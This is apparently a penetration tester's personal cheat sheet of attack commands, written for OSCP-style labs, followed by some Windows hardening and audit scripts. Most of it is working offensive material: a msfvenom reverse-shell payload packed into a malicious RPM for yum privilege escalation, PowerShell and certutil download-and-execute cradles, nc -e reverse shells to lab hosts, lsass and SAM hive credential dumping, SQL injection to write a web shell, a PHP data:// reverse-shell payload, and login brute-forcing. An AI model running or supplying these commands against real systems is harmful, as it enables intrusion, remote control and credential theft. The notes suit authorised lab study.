xfreerdp
xfreerdp /v:192.168.113.119 /u:victor /p:WormAloeVat7 /dynamic-resolution
yum
- https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2
- https://gtfobins.github.io/gtfobins/yum/
- create malicious rpm package
git clone https://github.com/jordansissel/fpm
cd fpm && sudo gem install fpm
sudo apt install -y rpm # rpmbuild dependency
- Create payload with msfvenom
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.4.66 LPORT=1337 -e x86/shikata_ga_nai -a x86 -f elf -o root_reverse_shell
- package the payload in an rpm file
fpm -n root -s dir -t rpm -a all --before-install $PAYLOAD $DESTINATION
- setup a listener
ncat -lnvp $LPORT
- installation of our malicious package
sudo yum --disablerepo=* localinstall -y root-1.0-1.noarch.rpm
- or
sudo dnf install --disablerepo=* -y root-1.0-1.noarch.rpm
tmux
- Shared tmux session
tmux new-session -s
tmux attach-session -t
- Shared tmux session with another user
tmux -S /tmp/ new -s # Create session
chgrp /tmp/ # change group of socket (other user needs that group)
tmux -S /tmp/ attach -t # from the other user, attach to the session using the socket
coercer
sudo python Responder.py -I ens33 --lm -A --disable-ess
Coercer -u 'usernamer' -p 'password' -d 'domain' --listener
Windows
certutil
- https://blog.ropnop.com/transferring-files-from-kali-to-windows
certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip
certutil.exe -urlcache -split -f http://192.168.49.146/rv.exe c:\windows\temp\rv.exe
cmd
- c:\windows\system32\cmd.exe
- C:\Windows\sysWOW64\cmd.exe
- C:\Windows\sysNative\cmd.exe
https://ss64.com/nt/syntax-64bit.html
| | 32 bit folder | 64 bit folder |
|---|---|---|
| 32 bit session | C:\Windows\system32\ | C:\Windows\sysNative\ |
| 64 bit session | C:\Windows\sysWOW64\ | C:\Windows\system32\ |
curl vbs
echo 'Set colNamedArguments = WScript.Arguments.Named' > curl.vbs
echo 'url = colNamedArguments.Item("url")' >> curl.vbs
echo 'data = ""' >> curl.vbs
echo 'ContentType = "application/x-www-form-urlencoded"' >> curl.vbs
echo 'If colNamedArguments.Exists("method") Then' >> curl.vbs
echo ' method = colNamedArguments.Item("method")' >> curl.vbs
echo 'Else' >> curl.vbs
echo ' method = "GET"' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'If colNamedArguments.Exists("json") Then' >> curl.vbs
echo ' ContentType = "application/json"' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'If colNamedArguments.Exists("dataFile") Then' >> curl.vbs
echo ' Set objFS = CreateObject("Scripting.FileSystemObject")' >> curl.vbs
echo ' dataFile = colNamedArguments.Item("dataFile")' >> curl.vbs
echo ' Set dataFileHandle = objFS.OpenTextFile(dataFile)' >> curl.vbs
echo ' Do Until dataFileHandle.AtEndOfStream' >> curl.vbs
echo ' data = data & dataFileHandle.ReadLine' >> curl.vbs
echo ' Loop' >> curl.vbs
echo ' dataFileHandle.Close' >> curl.vbs
echo 'End If' >> curl.vbs
echo 'dim xmlhttp: Set xmlhttp = CreateObject("MSXML2.ServerXMLHTTP")' >> curl.vbs
echo 'xmlhttp.Open method, url, False' >> curl.vbs
echo 'xmlhttp.setRequestHeader "Content-Type", ContentType' >> curl.vbs
echo 'xmlhttp.send data' >> curl.vbs
echo 'WScript.Echo xmlhttp.responseText' >> curl.vbs
echo 'Set xmlhttp = Nothing' >> curl.vbs
- Usage
' GET request
cscript \\samba\share\scripts\curl.vbs /url:http://example.com/
' POST request with URL encoded POST data in a file
cscript \\samba\share\scripts\curl.vbs /url:http://example.com/ /dataFile:urlEncodedData.txt /method:POST
' POST request with JSON POST data in a file
cscript \\samba\share\scripts\curl.vbs /url:http://example.com/ /dataFile:jsonData.txt /method:PATCH /json
- https://gist.github.com/cabloo/387f1d6d8fe81752574d
net
- https://en.wikiversity.org/wiki/Net_(command)/Localgroup
- mount share as drive letter with username:bobby <password: bobby> # /USER is case sensitive
net use g: \\10.10.14.235\tools /USER:bobby bobby
- list all services
net start
- create user
net user username password /add
- add user to local admin group
net localgroup Administrators ariah /add
netsh
- show outgoing firewall rules
netsh advfirewall firewall show rule name=all dir=out
powershell
- ping scan
1..254 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter "Address='172.16.2.$_' and Timeout=200 and ResolveAddressNames='true' and StatusCode=0" | select ProtocolAddress*}
- port scan
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("IP ADR",$_)) "Port $_ is open!"} 2>$null
- powershell PSDrive (network share)
New-PSDrive M FileSystem \\192.168.119.235\T
powershell -nop -noninter -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.235/winpeas.bat')"
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.119.235/winPEAS.bat','winpeas.bat')"
- runas
$username = 'alice'
$password = 'aliceishere'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -ArgumentList "-e cmd.exe 192.168.119.235 444" -Credential $credential
OR
powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))
- Web client (curl like)
(New-Object System.Net.WebClient).DownloadString("http://localhost/")
- Unzip
Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to
procdump
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp
// or avoid reading lsass directly by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
reg
reg save hklm\sam sam
reg save hklm\system system
reg save hklm\security security
runas
- run command as another user -> will prompt for password
runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443"
- run command as a domain user -> will prompt for password
runas /netonly /user:<domain name>\<domain username> "mmc /server=<domain controler>"
sc
- Change binary_path_name of service
cmd /c "sc config IObitUnSvr binPath= c:\Users\dharding\IObit.exe"
- Start service
cmd /c "sc start IObitUnSvr"
- Stop service
cmd /c "sc stop IObitUnSvr"
- Query service
cmd /c "sc qc IObitUnSvr"
schtask
- list scheduled tasks
schtasks /query /fo LIST /v
- list scheduled tasks + grep
schtasks /query /fo LIST /v | select-string 'TFTP' -context 10
sherlock
- from a cmd reverse shell
- takes a while to run
Append 'Find-AllVulns' at the end of Sherlock.ps1
powershell -nop -ep bypass "./Sherlock.ps1"
wget
JS
echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); > wget.js
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
echo WinHttpReq.Send(); >> wget.js
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
echo BinStream.Type = 1; >> wget.js
echo BinStream.Open(); >> wget.js
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
echo BinStream.SaveToFile("out.exe"); >> wget.js
cscript /nologo wget.js http://<ip>/<file>
PowerShell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://$args[0]:$args[1]/$args[2]" >>wget.ps1
echo $file = "$args[2]" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
- oneliner paste
echo $storageDir = $pwd > wget.ps1&echo $webclient = New-Object System.Net.WebClient >>wget.ps1&echo $url = "http://$args[0]/$args[1]" >>wget.ps1&echo $file = "$args[1]" >>wget.ps1&echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
VBS
- the single quotes below are for a PowerShell prompt; from cmd drop them, otherwise each line is written into the file as a VBScript comment
echo 'strUrl = WScript.Arguments.Item(0)' > wget.vbs
echo 'StrFile = WScript.Arguments.Item(1)' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DIRECT = 1' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PROXY = 2' >> wget.vbs
echo 'Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts' >> wget.vbs
echo 'Err.Clear' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")' >> wget.vbs
echo 'http.Open "GET", strURL, False' >> wget.vbs
echo 'http.Send' >> wget.vbs
echo 'varByteArray = http.ResponseBody' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set fs = CreateObject("Scripting.FileSystemObject")' >> wget.vbs
echo 'Set ts = fs.CreateTextFile(StrFile, True)' >> wget.vbs
echo 'strData = ""' >> wget.vbs
echo 'strBuffer = ""' >> wget.vbs
echo 'For lngCounter = 0 to UBound(varByteArray)' >> wget.vbs
echo 'ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))' >> wget.vbs
echo 'Next' >> wget.vbs
echo 'ts.Close' >> wget.vbs
cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
xcopy
- copy folder recursively
- https://www.devdungeon.com/content/recursively-copy-delete-and-move-directories-windows
xcopy <source> <destination> /E /H
Cypher Queries
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Services
Active Directory
Kerberos
Databases
MongoDB
crack password from pcap -> check PG Tico
MySQL
- SQLi to LFI
Get current user: utos=%' union select 1,(select user()),3,4,5,6,7,8,9,10,11,12,13,14 --
Check file privileges: utos=%' union select 1,(select group_concat('%0a',file_priv,'%0a') fRoM mysql.user where user='root'),3,4,5,6,7,8,9,10,11,12,13,14 --
Read a file: utos=%' union select 1,(select to_base64(load_file('C:\xampp\htdocs\discuss\index.php'))),3,4,5,6,7,8,9,10,11,12,13,14 --
- SQLi to RCE
utos=%' union select 1,"",3,4,5,6,7,8,9,10,11,12,13,14 into OUTFILE 'C:\xampp\htdocs\back.php' --
- privesc UDF
https://www.exploit-db.com/exploits/7856
https://www.exploit-db.com/exploits/46249 (x86)
https://www.exploit-db.com/exploits/1518
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7856.tar.gz
MSSQL
- Nmap recon
sudo proxychains -q nmap -sT -p1433,445,1434 --script 'ms-sql* and not brute' -oN recon/mssql-nmap 172.16.1.5 -vv
Oracle
- https://0xdf.gitlab.io/2018/08/04/htb-silo.html
- methodology: https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
Neo4j
Shares
FTP
- try anonymous
- try login with /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
ftp -A $IP # use active ftp
- recursive download (do not create host directory: -nH)
wget -nH -r ftp://anonymous:anonymous@$IP:30021
- recursive download, active FTP
wget -nH -r --no-passive-ftp ftp://anonymous:anonymous@$IP
GlusterFS
https://book.hacktricks.xyz/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs
sudo gluster --remote-host=10.10.11.131 volume list
- This will return the name of the volumes
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
- Sirol glusterfs privesc https://github.com/MauroEldritch/GEVAUDAN/blob/master/gevaudan.rb
NFS
- Mount NFS share with proxy
-L local_ip:local_port:remote_ip:remote_port
ssh -L 127.0.0.1:2049:127.0.0.1:2049
sudo mount -t nfs -o port=2049,proto=tcp localhost:/srv/Share nfs_mnt/
sudo proxychains -q nmap -sT -p111,2049 --script 'nfs*' -oN recon/nfs-service 172.16.1.5 -vv
- Check for no_root_squash -> the server trusts the uid:gid supplied by the client, i.e. permissions are effectively checked client side
SMB
- ERRORS (protocol negotiation failed:) -> add these two lines in /etc/samba/smb.conf under [global]
client min protocol = LANMAN1
client max protocol = SMB3
SMTP
- Enumerate users
smtp-user-enum -M VRFY -U users.txt -t $IP
- brute force pop3 login (hydra is unstable)
medusa -U users.txt -P cewl_passwords -M pop3 -h $IP
- brute force imap login
hydra -L smtp_users.txt -P cewl_passwords imap://$IP -I
| Command | Comment |
|---|---|
| ATRN | Authenticated TURN |
| AUTH | Authentication |
| BDAT | Binary data |
| BURL | Remote content |
| DATA | The actual email message to be sent. This command is terminated with a line that contains only a |
| EHLO | Extended HELO |
| ETRN | Extended turn |
| EXPN | Expand |
| HELO | Identify yourself to the SMTP server. |
| HELP | Show available commands |
| MAIL | Send mail from email account: MAIL FROM: me@mydomain.com |
| NOOP | No-op. Keeps your connection open. |
| ONEX | One message transaction only |
| QUIT | End session |
| RCPT | Send email to recipient: RCPT TO: you@yourdomain.com |
| RSET | Reset |
| SAML | Send and mail |
| SEND | Send |
| SOML | Send or mail |
| STARTTLS | |
| SUBMITTER | SMTP responsible submitter |
| TURN | Turn |
| VERB | Verbose |
| VRFY | Verify |
POP
--- pop3 server with netcat
| Command | Comment |
|---|---|
| USER | Your user name for this mail server |
| PASS | Your password. |
| QUIT | End your session. |
| STAT | Number and total size of all messages |
| LIST | Message# and size of message |
| RETR message# | Retrieve selected message |
| DELE message# | Delete selected message |
| NOOP | No-op. Keeps your connection open. |
| RSET | Reset the mailbox. Undelete deleted messages. |
Enumerate valid users with a known password + mail (check oscp beta)
#!/bin/bash
pass=1234
for user in marcus john mailadmin jenny ryuu
do
  (echo USER $user; sleep 2s; echo PASS $pass; sleep 2s; echo LIST; sleep 2s; echo QUIT) | ncat -nvC 10.11.1.72 110
done
medusa -U users.txt -P cewl_passwords -M pop3 -h $IP
telnet $IP 110
user
retr
IMAP
Ports
ident 113/tcp
returns which user is running a service on port N
CMS
BigTree
check oscp demo alpha
Drupal
- https://hacktricks.boitatech.com.br/pentesting/pentesting-web/drupal
--- user enumeration (hydra, password reset form)
hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'
--- user enumeration
/user/
--- page enumeration
/node/
--- droopescan
droopescan scan drupal -u 10.10.10.102:80
--- drupalgeddon
Joomla
joomscan -ec -u http://curling.htb
Wordpress
--- wpscan
-
SSRF http://10.10.110.100:65000/wordpress/index.php/wp-json/oembed/1.0/proxy?url=http://10.10.14.210
-
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/wordpress
HTTP
Grafana
check LFI vuln
IIS
• check index.
Jenkins
- https://book.hacktricks.xyz/cloud-security/jenkins
- https://github.com/gquere/pwn_jenkins
Check version leak:
http://172.16.1.19:8080/oops
http://172.16.1.19:8080/whoAmI/
/api/json?pretty=true
/asynchPeople/api/xml?depth=1 # list of users
/securityRealm/createAccount -> SecLists Web-Content -> Jenkins
Kibana / Elasticsearch
- check PG Sirol https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2
- RCE vulnerability in 2019 for Kibana versions < 6.6.0 https://github.com/Cr4ckC4t/cve-2019-7609
- get kibana version -> log in to the kibana dashboard -> Dev Tools -> Console, change the query to "GET /"
Obfuscated JavaScript
http://www.jsnice.org http://codeamaze.com/code-beautifier/javascript-deobfuscator (oscp gh0st)
PHP
- With LFI/RFI -> check filters
GET /section.php?page=data://text/plain;base64, HTTP/1.1
http://192.168.104.53:8080/site/index.php?page=data://text/plain,%3C?php%20echo%20shell_exec(%22whoami%22);%20?%3E
GET /section.php?page=data://text/plain;base64,& /dev/tcp/192.168.119.235/443 0>&1"); ?> HTTP/1.1
- php filters
http://192.168.243.58/image.php?img=php://filter/convert.base64-encode/resource=/proc/self/cwd/image.php
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-data
RedMine
default login: admin:admin
RCE -> CVE-2019-18890 3.2.9 and 3.3.x before 3.3.10
Tomcat
WAF
https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c
check PG/xposedapi
• X-Originating-IP: 127.0.0.1
• X-Forwarded-For: 127.0.0.1
• X-Remote-IP: 127.0.0.1
• X-Remote-Addr: 127.0.0.1
WebDav
- cadaver
- davtest (check extension upload)
davtest -url http://$IP -auth 'fmcsorley:CrabSharkJellyfish192'
cadaver $IP
XAMPP
--- With LFI
C:\xampp\mysql\bin\my.ini
C:\xampp\phpmyadmin\config.inc.php
IM
IRC
- connect to server
- list users
- list channels
- look for messages?
Message Queue
https://book.hacktricks.xyz/network-services-pentesting/5671-5672-pentesting-amqp https://book.hacktricks.xyz/network-services-pentesting/15672-pentesting-rabbitmq-management https://book.hacktricks.xyz/network-services-pentesting/1883-pentesting-mqtt-mosquitto
https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce -> PG/Clyde
https://www.exploit-db.com/exploits/49418
SNMP
snmp-check <- very nice tool
SSH
- bitvise ssh server for windows: requesting a terminal fails with
Terminal initialization failure. See server logs for more info.
Hint: Try requesting a different terminal environment.
Connection to 192.168.206.179 closed.
Solution: pass a command instead of requesting a terminal
ssh -i ~/.ssh/dvr4_viewer_key viewer@$IP "cmd"
Proxy
Forward Socks Proxy
ssh -D <port>
Reverse Socks Proxy
ssh -R <port>
Port Forwarding
Local Port Forwarding
Remote Port Forwarding
SMB
proxychains -q enum4linux -a -u "" -p "" 172.16.1.20
proxychains -q enum4linux -a -u "guest" -p "" 172.16.1.20
proxychains -q smbmap -u "" -p "" -P 445 -H 172.16.1.20
proxychains -q smbmap -u "guest" -p "" -P 445 -H 172.16.1.20
smbclient -U '%' -L //172.16.1.20
smbclient -U 'guest' -L //172.16.1.20
LDAP
nmap -n -sV --script "ldap* and not brute" -p 389 172.16.1.20
VoIP
https://github.com/trustedsec/SeeYouCM-Thief
https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/
https://www.cisco.com/c/en/us/support/docs/unified-communications/unified-communications-manager-callmanager/200408-Retrieve-Phone-Configuration-File-from-T.html
Check for files on TFTP server
- ConfigFileCacheList.txt
- SEP<MAC>.cnf.xml
- SIPDefault.cnf
- XMLDefault.cnf.xml
Hosting
iptables
DIY portquiz.net
# /etc/iptables/rules.v4
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A PREROUTING -i lo -j RETURN
-A PREROUTING -p icmp -j RETURN
-A PREROUTING -m state --state RELATED,ESTABLISHED -j RETURN
-A PREROUTING -p tcp -j DNAT --to-destination :8888
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 8888 -j ACCEPT
-A INPUT -j DROP
COMMIT
# /etc/xinetd.d/alive
service simple-tcp
{
disable = no
type = UNLISTED
id = tcp-service
socket_type = stream
port = 8888
protocol = tcp
user = nobody
wait = no
server = /bin/echo
server_args = Alive!
instances = 25
log_on_success += DURATION HOST
log_on_failure += ATTEMPT HOST
per_source = 5
flags = IPv4
}
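Client side of the DIY portquiz above, as an added example that is not part of the original notes: it connects to each port on the host running the iptables/xinetd setup and only counts a port as reachable when the `Alive!` banner from the echo service comes back, which is how you verify that an egress filter allows exactly the ports it should and nothing else. `portquiz.example.net` is a placeholder for your own server.

```powershell
# Added example: probe outbound ports against the DIY portquiz host.
# Every TCP port on that host is DNATed to the xinetd service that prints "Alive!",
# so the banner (not just a completed handshake) proves the path is really open.
function Test-EgressPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int[]]$Port,
        [int]$TimeoutMs = 3000
    )
    foreach ($p in $Port) {
        $client = New-Object System.Net.Sockets.TcpClient
        $status = 'blocked'                      # default until we see otherwise
        try {
            # ConnectAsync + Wait gives a connect timeout; a refused/filtered port throws
            if ($client.ConnectAsync($ComputerName, $p).Wait($TimeoutMs) -and $client.Connected) {
                $status = 'connected (no banner)' # handshake ok, but maybe a proxy/middlebox
                $stream = $client.GetStream()
                $stream.ReadTimeout = $TimeoutMs
                $buf = New-Object byte[] 64
                $n = $stream.Read($buf, 0, $buf.Length)
                $banner = [Text.Encoding]::ASCII.GetString($buf, 0, $n).Trim()
                # Only our own banner proves we reached the portquiz box end to end
                $status = if ($banner -eq 'Alive!') { 'open' } else { "intercepted ($banner)" }
            }
        } catch {
            # connect or read failed: keep whatever status was reached before the error
        } finally {
            $client.Dispose()
        }
        [pscustomobject]@{ Port = $p; Status = $status }
    }
}

# Placeholder host; 8888 is the xinetd port itself, the others go through the DNAT rule
Test-EgressPort -ComputerName 'portquiz.example.net' -Port 22, 80, 443, 8888, 31337 |
    Format-Table -AutoSize
```

Any port reported as open that is not on the allow-list is a gap in the egress policy worth closing.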
Apache
Nginx
System Configuration
Windows
Enable Sysmon
- sysmon-config
Run as admin:
sysmon.exe -accepteula -c sysmonconfig-export-block.xml
Disable Legacy DNS
- Disable mDNS
New-Item "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT" -Name DNSClient -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name EnableMultiCast -Value 0 -PropertyType DWORD -Force
- Disable LLMNR
New-Item "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT" -Name DNSClient -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name DisableSmartNameResolution -Value 1 -PropertyType DWORD -Force # 1 = off; 0 leaves smart multi-homed name resolution enabled
- Disable NetBIOS on all network interfaces
$regkey = "HKLM:\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey `
| ForEach-Object {Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}
Disable WPAD (Proxy Discovery)
New-Item "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\" -Name WinHttp -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\" -Name "DisableWpad" -Value 4 -PropertyType DWORD -Force
Disable IPv6 on all interfaces
Get-NetAdapterBinding `
| Where-Object {$_.ComponentID -EQ 'ms_tcpip6' -and $_.Enabled -EQ $true} `
| ForEach-Object {Disable-NetAdapterBinding -Name $_.Name -ComponentID 'ms_tcpip6' -ErrorAction SilentlyContinue -Verbose; Start-Sleep -Seconds 3}
Enable Virtualization Based Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard
New-Item "HKLM:\SYSTEM\CurrentControlSet\Control\" -Name DeviceGuard -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType DWORD -Value 1 -Force
Enable Windows Defender Credential Guard
New-Item "HKLM:\SYSTEM\CurrentControlSet\Control\" -Name Lsa -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LsaCfgFlags" -PropertyType DWORD -Value 2 -Force
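An audit script for the hardening steps above, added here and not part of the original notes: it reads each registry value back and reports whether the hardened value is in place. Expected values follow the notes, except that DisableSmartNameResolution is checked for 1 (the value that actually turns the feature off) and DisableWpad accepts either 1 (Microsoft's documented value) or the 4 used above; LsaCfgFlags 1 and 2 both mean Credential Guard is on.

```powershell
# Added audit: verify the Windows hardening settings from the notes are applied.
$regChecks = @(
    @{ Check = 'Multicast name resolution off (EnableMultiCast)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'; Name = 'EnableMultiCast'; Expected = @(0) },
    @{ Check = 'Smart multi-homed name resolution off'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'; Name = 'DisableSmartNameResolution'; Expected = @(1) },
    @{ Check = 'WPAD off'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp'; Name = 'DisableWpad'; Expected = @(1, 4) },
    @{ Check = 'Virtualization Based Security on'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard'; Name = 'EnableVirtualizationBasedSecurity'; Expected = @(1) },
    @{ Check = 'Credential Guard on (LsaCfgFlags)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'LsaCfgFlags'; Expected = @(1, 2) }
)

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # $null when the key or value is missing, i.e. the policy was never applied
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$results = @(foreach ($c in $regChecks) {
    $actual = Get-RegValue -Path $c.Path -Name $c.Name
    [pscustomobject]@{
        Check    = $c.Check
        Actual   = if ($null -eq $actual) { '<missing>' } else { $actual }
        Hardened = ($null -ne $actual) -and ($c.Expected -contains $actual)
    }
})

# NetBIOS over TCP/IP must be disabled (NetbiosOptions = 2) on every interface, not just some
$nbtKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$nbtOn = @(Get-ChildItem $nbtKey | Where-Object {
    (Get-ItemProperty -Path "$nbtKey\$($_.PSChildName)").NetbiosOptions -ne 2 })
$results += [pscustomobject]@{ Check = 'NetBIOS off on all interfaces'
    Actual = "$($nbtOn.Count) interface(s) still enabled"; Hardened = ($nbtOn.Count -eq 0) }

# IPv6 should be unbound from every adapter (what Disable-NetAdapterBinding above does)
$v6On = @(Get-NetAdapterBinding -ComponentID 'ms_tcpip6' | Where-Object { $_.Enabled })
$results += [pscustomobject]@{ Check = 'IPv6 unbound on all adapters'
    Actual = "$($v6On.Count) adapter(s) still bound"; Hardened = ($v6On.Count -eq 0) }

$results | Format-Table -AutoSize
```

Run it after a reboot as well: VBS and Credential Guard only take effect once the machine has restarted with the new registry values.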
Hardware
Raspberry Pi
Builtin power on/off button
- Connect a button to pin 5 and ground to issue a soft shutdown.
[pi4]
dtparam=i2c_arm=off
dtoverlay=gpio-shutdown,gpio_pin=3,active_low=1